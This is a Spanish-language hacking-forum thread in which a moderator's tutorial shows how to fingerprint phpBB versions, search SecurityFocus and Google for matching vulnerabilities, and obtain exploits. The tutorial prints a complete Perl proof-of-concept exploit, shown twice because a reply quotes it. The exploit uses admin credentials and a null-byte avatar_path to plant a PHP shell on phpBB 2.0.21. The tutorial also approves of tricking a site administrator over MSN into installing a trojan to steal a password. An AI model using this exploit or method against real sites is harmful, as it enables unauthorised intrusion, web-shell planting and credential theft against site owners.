Nuevas NORMAS para el foro
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Agosto 07, 2008, 05:25:54
Boton Buscar
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades (Leído 1913 veces)
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2049
foro.new-bytes.net
Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
en:
Mayo 31, 2007, 10:09:46 »
- Tutorial Creado para New-Bytes.net
- En este Tutorial Explicare la forma mas facil de encontrar informacion sobre las vulnerabilidades de las distintas aplicaciones que se encuentran en una pagina web, no intenta de ser una guia paso a paso, pero si un buen referente para que luego exploten sus propios metodos de investigacion, y principalmente leer , para evitar preguntas sin sentidos.
Oz ¡
Ahy varias formas de auditar una pagina web, si no es via "host" escaneando sus puertos y examinando que Servicios Tienen corriendo, (ftp, http, etc):
Código:
nmap -v -sSV -P0
Tambien se puede hacer una "escanear" manual, buscando los Scripts que ocupan, foros, blogs, sistemas de noticias, etc..
[alerta] Un aspecto esencial es ver de que version es.
Este Ejemplo es en los foros PHPBB
Código:
http://<server>/[path]/docs/CHANGELOG.html
Le agregamos una Version mas, por ejemplo si Sale 2.0.20 , es 2.0.21, porque ahy explica los cambios que se s creado en la version anterior 2.0.20 pero en esta "version" 2.0.21 todavia no lo corrigen, o mejor dicho el administrador no actualiza el script
En una forma bastante eficaz, porque muchos de estos scripts son bastante vulnerables , RFI, SQL, XSS entre otros.
La ventaja es que estas vulnerabilidades se pueden explotar directamente desde el navegador, pero siempre existen programas que facilitan este procedimiento, creando script en perl, php, etc, para solo introducir los datos y este aprovecha la vulnerabilidad.
[ide-bombilla] Antes de avanzar quiero aclarar algo:
Vulnerabilidad
= Fallo en el sistema, para que cualquier usuarios mal "intencionado" pueda ejecutar codigos arbitrarios en el sistema victima
Exploit
= Codigo
(compilado, interpretado)
,o
Accion
que aprovecha una vulnerabilidad, para tener privilegios en el sistema.
¿A que me refiero con Accion?
Que no necesariamente tiene que ser un Exploit escrito en Perl que se tenga que interpretar , si no tambien una simple inyeccion sql , rfi, xss, es un exploit. Codigos directamente incrustados desde el navegador, muchos users creen que el "Exploit" tiene que ser un programa que se tiene que compilar o interpretar, pero esto no es asi. Puede ser cualquier codigo, o incluso puede ser hasta ing social
Hacerce pasar por chica en msn y enviarle un troyano al administrador para averiguar la password de su sitio sigue siendo parte de un Exploit. Pero no es ni un Codigo ni Nada
"Human Exploit"
No e Escuchado a nadie Hacer termino a "Human Exploit" como parte de un tipo de Exploit mas, pero intento que si se haga XD¡. para hacer referencia a la Ing social como parte de un Exploit (que aprovecha una vulnerabilidad)
Una ves Vista la Version del Script, En este caso el Foro PHPBB, Talves nos surgan las siguientes dudas:
¿Que tenemos que Hacer Ahora?
Citar
R: Ir algun Bugtrag y Buscar si Existen alguna Vulnerabilidad
¿Donde la Encuentro?
Citar
www.Securityfocus.com
¿Estara Listo?
Citar
Si existe alguna vulnerabilidad, existira alguna explicacion, pero no necesariamente existira algun tipo de exploit
¿Tendre que Leer?
Citar
Si no te gusta leer no sigas leyendo
[alerta] Buscando en la Enciclopedia de las Vulnerabilidad:
Ingresamos a
www.Securityfocus.com
Ingresamos a
Vulnerabilities
En
Vendor
Selecionamos el Nombre del Script, en este caso PHPBB
y Buscamos su
Version
Algunas Veces nos nos encontraremos con Ninguna Vulnerabilidad.
Una vez Encontrada la Version, Podremos visualizar las Vulnerabilidades, ahora devemos ingresar a los Link expuestos para poder averiguar
¿Que tipo de Vulnerabilidad Tiene?
y asi Poder seguir buscando.
Para Cada vulnerabilidad tenemos que leer su descripcion, ahora el ingles no es una dificultar ¿puedes leer? ¿Sabes Ocupar Google? .
Citar
El Script PHPBB esta suseptible a la ejecucion de codigos php arbitrarios, los atacantes puedes tener privilegios sobre el servidor en donde se aloja la pagina web
Ingresamos a la Pestaña Exploit:
Citar
Los atacantes puedes Explotar esta vulnerabilidad por el navegador
[alerta] Ahora ya tenemos mas informacion sobre las vulnerabilidad, es importante leer cada una de ellas, para asi tener una mayor posibilidad para poder encontrar algun Exploit.
En lo Personal Si quiero Buscar algun Exploit Parto Obviamente por el titulo:
Google
Citar
"phpBB Avatar_Path PHP Code Execution Vulnerability"exploit
Claramento
aunque no en todos los casos
, nos devolvera los link de securityfocus al inicio, pero ahy otras webs de seguridad , en donde dan como noticia la misma vulnerabilidad, en algunos casos estos sitios exponen links directos hacia los exploits, o como tambien en muchos casos que no.
Pero tambien si analizamos un poco mas, podriamos buscar por el autor , quien descubrio la Vulnerabilidad, mas otras palabras claves:
[ide-bombilla] Como ven nos Tira un Link hacia Milw0rm donde claramente ahy un Exploit.
http://www.milw0rm.com/exploits/2348
Código:
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless( @ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
# milw0rm.com [2006-09-11]
[alerta] Eso era con 1 sola Vulnerabilidad, ahora expondre los Link de las otras vulnerabilidad que encontro Securityfocus en su Base de datos:
phpBB Privmsg.PHP HTML Injection Vulnerability
Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability
Securitfocus nos ayuda bastante para empezar , a buscar las vulnerabilidades, asi podremos ir cada vez avanzado, pero ya teniendo una Guia.
[alerta] Para Entender ahy que leer sobre los distintos tipos de Vulnerabilidad, no sacamos nada, con encontrar el exploit, si no sabemos que es lo que hace, es por ello que es necesario leer sobre las "nociones basicas" de las distintas vulnerabilidades, y asi tambien algun lenguaje de programacion, si no hacen esto, existiran preguntas talves como:
¿Que hago Ahora?
Lo Compilo y no Sale nada¡
¿Que es Exploit?
Ahy una buena base de informacion en el Foro de Vulnerabildiades de
new-bytes.net
[alerta] LEEER¡ NO EVITAR LA FLOJERA MENTAL ¡¡¡ AHY QUE LEER¡' PARA SABER¡¡¡
Creo que es una Duda bastante recurrente y bueno , es bueno resolver una duda mas aunque sea pequeña .
Oz
www.new-Bytes.net
Si van a Copiar Exponer de donde lo sacaron, y quien es el autor.
- Tutorial Creado para New-Bytes.net
«
Última modificación: Junio 19, 2008, 06:02:18 por ManCuerTex (ViPeR)
»
En línea
http://foro.new-bytes.net
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2049
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #1 en:
Junio 01, 2007, 01:35:58 »
Cita de: L0ukh4ck5 en Mayo 31, 2007, 10:32:03
Esta muy bueno Salu2 tu siempre aportando
jeje thanx bro XD¡.
«
Última modificación: Junio 19, 2008, 06:02:41 por ManCuerTex (ViPeR)
»
En línea
http://foro.new-bytes.net
SeNeGe
Visitante
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #2 en:
Junio 01, 2007, 06:31:05 »
hola bueno siempre digo que no importa que tanta info tenga si no como se explica muy bueno.
salu2
SNG
En línea
invisible_hack
Miembro
Desconectado
Mensajes: 71
Silent IP - La forma más fácil de sacar la Ip =D
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #3 en:
Julio 05, 2007, 04:49:39 »
Es weno!!
Saludos!!
En línea
-_-_-_
www.invisiblehack.foro.st
-_-_-_
¡¡Regístrate!!
ElPerro
Gran Colaborador
Desconectado
Mensajes: 1265
ElPerro - 7Angels.com.ar
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #4 en:
Julio 05, 2007, 04:30:25 »
En línea
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2049
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #5 en:
Julio 10, 2007, 04:39:20 »
jejej thanx bro :=)
En línea
http://foro.new-bytes.net
ek_col
Visitante
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #6 en:
Agosto 13, 2007, 11:16:09 »
Muy bueno y lo mejor ,,,,era lo que estaba buscado....
Gracias
En línea
.bAcKdOoR.
Recien Llegado
Desconectado
Mensajes: 5
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #7 en:
Enero 11, 2008, 07:52:30 »
jejeje
saludos perrin!
a la vuelta leo.. ya le heche un ojo ala rapida!
Saludos =)
En línea
Chile =)
WaNlOx
Recien Llegado
Desconectado
Mensajes: 9
la sabiduria es vida
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #8 en:
Abril 09, 2008, 07:56:43 »
que paso con este post?¿?
En línea
[[zix]]
Moderación
Gran Colaborador
Desconectado
Mensajes: 2029
¿Quieres saber?, toma tiempo para aprender.
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #9 en:
Abril 09, 2008, 09:52:36 »
Cita de: WaNlOx en Abril 09, 2008, 07:56:43
que paso con este post?¿?
Dañado bro...Enviale un IM a un global o a ozX para ver si lo pueden areglar
SALudos
TH3 ziX
En línea
Galeria de Diseño de ziX
EOF [ Vacaciones ]
Gran Colaborador
Desconectado
Mensajes: 2217
EndOfFile................. CodeBuser..............
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #10 en:
Abril 09, 2008, 09:53:56 »
si te urge prisa busca en los caches de google
saludos
En línea
NORMAS DEL FORO
NOD32 ESET Smart Security 3.0.650 [ Funcionando ]
|
KIS6 & KIS7 [ de por vida ]
cu4nd0 cu3nte h4sta tR3s, v0lv3r4as a la n0rm4l1d4d
TerminalHacker.net
LatinoHack.com
drago5n
Habitual
Desconectado
Mensajes: 249
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #11 en:
Abril 10, 2008, 02:27:04 »
oigan sera que no pueden volver a poner la info
grasias
salu2
En línea
[[zix]]
Moderación
Gran Colaborador
Desconectado
Mensajes: 2029
¿Quieres saber?, toma tiempo para aprender.
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #12 en:
Abril 10, 2008, 02:32:40 »
Bueno debido a que el moderador casi nose conecta ahora le mando un IM a zolo aver si puede areglar el post
Th3 ziX
En línea
Galeria de Diseño de ziX
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2049
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #13 en:
Abril 12, 2008, 10:56:27 »
si me conecto
¬¬...
ni idea que le abra pasado al post..
si no lo encuentro nuevamente en otros foros lo borro.
saludos¡
En línea
http://foro.new-bytes.net
R/Q
Miembro
Desconectado
Mensajes: 25
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #14 en:
Mayo 22, 2008, 04:33:53 »
donde esta donde?? donde? el tutorial que no lo veo..
En línea
"ignorante no es aquel que no sabe, es aquel que sabiendo no enseña"
Flori4n
Recien Llegado
Desconectado
Mensajes: 2
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #15 en:
Junio 18, 2008, 07:25:09 »
Where's the link ? text
En línea
[[zix]]
Moderación
Gran Colaborador
Desconectado
Mensajes: 2029
¿Quieres saber?, toma tiempo para aprender.
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #16 en:
Junio 18, 2008, 11:37:54 »
Este es el Tuto:
Cita de: OzX en Mayo 31, 2007, 10:09:46
- Tutorial Creado para New-Bytes.net
- En este Tutorial Explicare la forma mas facil de encontrar informacion sobre las vulnerabilidades de las distintas aplicaciones que se encuentran en una pagina web, no intenta de ser una guia paso a paso, pero si un buen referente para que luego exploten sus propios metodos de investigacion, y principalmente leer , para evitar preguntas sin sentidos.
Oz ¡
Ahy varias formas de auditar una pagina web, si no es via "host" escaneando sus puertos y examinando que Servicios Tienen corriendo, (ftp, http, etc):
Código:
nmap -v -sSV -P0
Tambien se puede hacer una "escanear" manual, buscando los Scripts que ocupan, foros, blogs, sistemas de noticias, etc..
[alerta] Un aspecto esencial es ver de que version es.
Este Ejemplo es en los foros PHPBB
Código:
http://<server>/[path]/docs/CHANGELOG.html
Le agregamos una Version mas, por ejemplo si Sale 2.0.20 , es 2.0.21, porque ahy explica los cambios que se s creado en la version anterior 2.0.20 pero en esta "version" 2.0.21 todavia no lo corrigen, o mejor dicho el administrador no actualiza el script
En una forma bastante eficaz, porque muchos de estos scripts son bastante vulnerables , RFI, SQL, XSS entre otros.
La ventaja es que estas vulnerabilidades se pueden explotar directamente desde el navegador, pero siempre existen programas que facilitan este procedimiento, creando script en perl, php, etc, para solo introducir los datos y este aprovecha la vulnerabilidad.
[ide-bombilla] Antes de avanzar quiero aclarar algo:
Vulnerabilidad
= Fallo en el sistema, para que cualquier usuarios mal "intencionado" pueda ejecutar codigos arbitrarios en el sistema victima
Exploit
= Codigo
(compilado, interpretado)
,o
Accion
que aprovecha una vulnerabilidad, para tener privilegios en el sistema.
¿A que me refiero con Accion?
Que no necesariamente tiene que ser un Exploit escrito en Perl que se tenga que interpretar , si no tambien una simple inyeccion sql , rfi, xss, es un exploit. Codigos directamente incrustados desde el navegador, muchos users creen que el "Exploit" tiene que ser un programa que se tiene que compilar o interpretar, pero esto no es asi. Puede ser cualquier codigo, o incluso puede ser hasta ing social
Hacerce pasar por chica en msn y enviarle un troyano al administrador para averiguar la password de su sitio sigue siendo parte de un Exploit. Pero no es ni un Codigo ni Nada
"Human Exploit"
No e Escuchado a nadie Hacer termino a "Human Exploit" como parte de un tipo de Exploit mas, pero intento que si se haga XD¡. para hacer referencia a la Ing social como parte de un Exploit (que aprovecha una vulnerabilidad)
Una ves Vista la Version del Script, En este caso el Foro PHPBB, Talves nos surgan las siguientes dudas:
¿Que tenemos que Hacer Ahora?
Citar
R: Ir algun Bugtrag y Buscar si Existen alguna Vulnerabilidad
¿Donde la Encuentro?
Citar
www.Securityfocus.com
¿Estara Listo?
Citar
Si existe alguna vulnerabilidad, existira alguna explicacion, pero no necesariamente existira algun tipo de exploit
¿Tendre que Leer?
Citar
Si no te gusta leer no sigas leyendo
[alerta] Buscando en la Enciclopedia de las Vulnerabilidad:
Ingresamos a
www.Securityfocus.com
Ingresamos a
Vulnerabilities
En
Vendor
Selecionamos el Nombre del Script, en este caso PHPBB
y Buscamos su
Version
Algunas Veces nos nos encontraremos con Ninguna Vulnerabilidad.
Una vez Encontrada la Version, Podremos visualizar las Vulnerabilidades, ahora devemos ingresar a los Link expuestos para poder averiguar
¿Que tipo de Vulnerabilidad Tiene?
y asi Poder seguir buscando.
Para Cada vulnerabilidad tenemos que leer su descripcion, ahora el ingles no es una dificultar ¿puedes leer? ¿Sabes Ocupar Google? .
Citar
El Script PHPBB esta suseptible a la ejecucion de codigos php arbitrarios, los atacantes puedes tener privilegios sobre el servidor en donde se aloja la pagina web
Ingresamos a la Pestaña Exploit:
Citar
Los atacantes puedes Explotar esta vulnerabilidad por el navegador
[alerta] Ahora ya tenemos mas informacion sobre las vulnerabilidad, es importante leer cada una de ellas, para asi tener una mayor posibilidad para poder encontrar algun Exploit.
En lo Personal Si quiero Buscar algun Exploit Parto Obviamente por el titulo:
Google
Citar
"phpBB Avatar_Path PHP Code Execution Vulnerability"exploit
Claramento
aunque no en todos los casos
, nos devolvera los link de securityfocus al inicio, pero ahy otras webs de seguridad , en donde dan como noticia la misma vulnerabilidad, en algunos casos estos sitios exponen links directos hacia los exploits, o como tambien en muchos casos que no.
Pero tambien si analizamos un poco mas, podriamos buscar por el autor , quien descubrio la Vulnerabilidad, mas otras palabras claves:
[ide-bombilla] Como ven nos Tira un Link hacia Milw0rm donde claramente ahy un Exploit.
http://www.milw0rm.com/exploits/2348
Código:
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless( @ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
# milw0rm.com [2006-09-11]
[alerta] Eso era con 1 sola Vulnerabilidad, ahora expondre los Link de las otras vulnerabilidad que encontro Securityfocus en su Base de datos:
phpBB Privmsg.PHP HTML Injection Vulnerability
Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability
Securitfocus nos ayuda bastante para empezar , a buscar las vulnerabilidades, asi podremos ir cada vez avanzado, pero ya teniendo una Guia.
[alerta] Para Entender ahy que leer sobre los distintos tipos de Vulnerabilidad, no sacamos nada, con encontrar el exploit, si no sabemos que es lo que hace, es por ello que es necesario leer sobre las "nociones basicas" de las distintas vulnerabilidades, y asi tambien algun lenguaje de programacion, si no hacen esto, existiran preguntas talves como:
¿Que hago Ahora?
Lo Compilo y no Sale nada¡
¿Que es Exploit?
Ahy una buena base de informacion en el Foro de Vulnerabildiades de
new-bytes.net
[alerta] LEEER¡ NO EVITAR LA FLOJERA MENTAL ¡¡¡ AHY QUE LEER¡' PARA SABER¡¡¡
Creo que es una Duda bastante recurrente y bueno , es bueno resolver una duda mas aunque sea pequeña .
Oz
www.new-Bytes.net
Si van a Copiar Exponer de donde lo sacaron, y quien es el autor.
- Tutorial Creado para New-Bytes.net
En línea
Galeria de Diseño de ziX
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2049
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #17 en:
Junio 19, 2008, 04:45:26 »
¿? Las img no em cargan, chekeare.
En línea
http://foro.new-bytes.net
Black_Jack21
Recien Llegado
Desconectado
Mensajes: 15
H4ck 15 5h4r3 1nf0rm4t10n
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #18 en:
Junio 20, 2008, 09:19:50 »
exelete tuto
En línea
xkanonx
Recien Llegado
Desconectado
Mensajes: 1
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #19 en:
Julio 06, 2008, 02:32:40 »
Saluoos weon buen aporte....
En línea
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Seguridad
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Phreaking
===> Moviles
=> Bug y Exploits
-----------------------------
Hack Novato
-----------------------------
=> Hack para newbies
=> Todo Messenger
=> Troyanos y virus
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows y otros sistemas operativos no libres
===> Problemas Tecnicos Windows
=> Sistemas operativos libres.
===> GNU/Linux
===> Manuales y Tutoriales
===> Descargas
-----------------------------
Programacion
-----------------------------
=> Programación
===> Programación Basica
===> Otros Lenguajes
===> Visual Basic y Net
===> ASM
===> Programacion Shell
===> Perl
===> Carbide C/C#/C++
===> Batch
===> SQL
=> Programacion para webmasters
===> Consultas
===> Php
===> Html
===> Java - Java Script
===> Php Nuke
===> Scripts Pre-Fabricados
===> Mysql
===> CSS y Diseño Web
-----------------------------
Artes Graficas
-----------------------------
=> Diseño Grafico
===> Battle Arts
===> Flash
===> Tutoriales
===> Galerías
===> Software
-----------------------------
Area Tecnica
-----------------------------
=> Networking & Wireless
=> Overclocking, Refrigeracion y demas
=> Hardware
===> Cursos Y manuales
=> Electronica Y Robotica
-----------------------------
Programas
-----------------------------
=> Software
===> Configuraciones de software
===> Pedidos de software
=> Cracks & Serialz
=> P2p, Bittorrent, Elinks
-----------------------------
Multimedia Y Divx
-----------------------------
=> Juegos PC Y Consolas
===> Dudas ayudas y comentarios de juegos
===> Pedidos de juegos
=> Mp3
=> Multimedia
=> Peliculas Divx
-----------------------------
Entretenimiento Y sitios de interes
-----------------------------
=> Juegos, Humor y Adultos. (Diversión)
===> Adultos
=> Paginas Webs Recomendadas
=> Videos
Powered by SMF 1.1.5
|
SMF © 2006-2007, Simple Machines LLC
Loading...